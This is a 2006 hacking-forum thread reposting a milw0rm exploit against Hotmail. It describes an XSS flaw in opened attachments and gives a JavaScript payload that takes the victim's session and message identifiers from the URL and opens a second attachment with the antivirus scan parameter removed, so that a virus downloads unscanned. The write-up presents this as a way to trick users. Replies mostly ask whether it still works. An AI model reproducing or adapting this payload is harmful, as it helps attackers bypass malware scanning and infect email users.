Guest Nemessis Posted October 9, 2006 Report Posted October 9, 2006 - HOTMAIL XSS and AV bypass exploit -To show a practical exploit of the XSS on Hotmail webmail server, let's do somethingdirty..., let's force the target user to do something that he would never had allowed:Downloading a virus (from Hotmail, of course):)I was thinking on some kind of mailbox access, but I needed ActiveX help, and some peoplecould think: "I do not allow ActiveX on my browser..." or "I run Mozilla...", etc.So the challenge has been to show how only with javascript, an XSS theoretically nonexploitable (no access to cookies), and some misconfiguration on Hotmail webmail canresult in a serious security problem.1) I know XSS is present (on file attachments) (good)2) No access to cookies from the code injected (bad)3) Is not a flaw in input filtering, any script code is allowed (good)4) I don't know if there is any kind of IP based session tracking method (bad)5) Redirecting the output of forced client requests from the XSS code is possible (good)6) The code to succefully exploit redirection (ActiveX, extended XML,...) is browser dependant (bad)So at least the only room I have to play is Javascript (exploiting XSS only with HTMLinjection doesn't seem to be effective in this case...).If we take a look at the URL from where attachments are opened, we can see the session identifierand message identifier.With this info we can build a request to... the same message we have sent?Yes, yes, yes. The same message (same identifier) can have many attachments...We can make a request to the same message but different attachment...Why this??? Imagine that we could bypass the antivirus software only with a litle modificationof the HTTP request... We could not do this in the same attachment we send our XSS code, becausethis is directly opened by the browser of the target, but we could still force a crafted request fromour XSS code to open a different attachment (on the same message) and without calling the AV software. How to bypass the AV software...This a sample URL to get an attachment from Hotmail.http://by7fd.bay7.hotmail.msn.com/cg...ox=F000000001&a=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&msg=MSGXXXXXXXX XX.XX&start=XXXXXXX& len=XXXX&mimepart=3&vscan=scan"vscan=scan" ... ummm... Remove this, and the antivirus will not be called! Scared? Wait... Now lets send to the target user a mail with two attachments. The first one whit this code:---------------------------------------------------------------------------------------------<html><script>str1=document.URLstr2=str1.slice(55,110)splitString = str2.split("&")str3=splitString[0]+"&"+splitString[1]window.open('http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a='+str3+'&mimepart=4')</script></html>----------------------------------------------------------------------------------------------Notice that to make this code working on any enviroment, you will have to use ?splits?and not ?slices?. This is a proof of concept exploit. The only important thing is to extract user and message identifiers, no matter how you achieve this. If this code doesn?t work for you, try to change slice(X,Y).The second attachment will be a virus testing file (for example EICAR).Once the target opens the first attachment, the AV software will tell him that all it's OK, butwhen he tries to download the file, it will be opened "online", the XSS code will be executed and:-session ID and message ID will be retrieved-a new window will be opened pointing to the second attachment, but without calling AV softwareWhat can see the user?He will see that he can download the file, without any AV warning, he will see that is downloading fromHotmail.An experienced user can notice that something strange it's happening... but still is possible to trick him byopening a similar page to the one showed when the AV software is called... As always, now, the only limit is the imagination of the attacker.Conclusions:-XSS is present on Hotmail-Hotmail Antivirus software can easily be bypassed exploiting this XSS-Users of Hotmail are on high riskXSS Screenshots: http://www.infohacking.com/INFOHACKI...otmail_XSS.pnghttp://www.infohacking.com/INFOHACKI...otmail_XSS.pnghttp://www.infohacking.com/INFOHACKI...otmail_XSS.pnghttp://www.infohacking.com/INFOHACKI...otmail_XSS.pnghttp://www.infohacking.com/INFOHACKI...otmail_XSS.png//Selametle kalin..Credit - presented by Tontonq on milw0rm.com Quote
th0r Posted October 10, 2006 Report Posted October 10, 2006 Is it new?Erhmm ..The link is not working man ..Thanks.Th0R Quote
Guest Nemessis Posted October 10, 2006 Report Posted October 10, 2006 Not the screenshots is important, the content is Quote
th0r Posted October 10, 2006 Report Posted October 10, 2006 Is this still working??Because its old .. Correct m3h if im wrong .. >,<Thanks.Th0R Quote
recuento Posted October 10, 2006 Report Posted October 10, 2006 You could easily test it and see if it does. Quote
Guest Nemessis Posted October 10, 2006 Report Posted October 10, 2006 Is a new post on milw0rm th0r. I don't know exactly how old is it. Quote
th0r Posted October 11, 2006 Report Posted October 11, 2006 Nemessis wrote: Is a new post on milw0rm th0r. I don't know exactly how old is it.Hmm ..I found that website of: http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/Hotmail/index.htmLike 9 months / 1 year ago ..Its pretty old though ..As far as i can remember this thing is not working anymore ..But i will try it again ..Anyway thanks for reporting it Nemessis xD~~I dont know if it is new in milw0rm xD~~Thanks.Th0R Quote
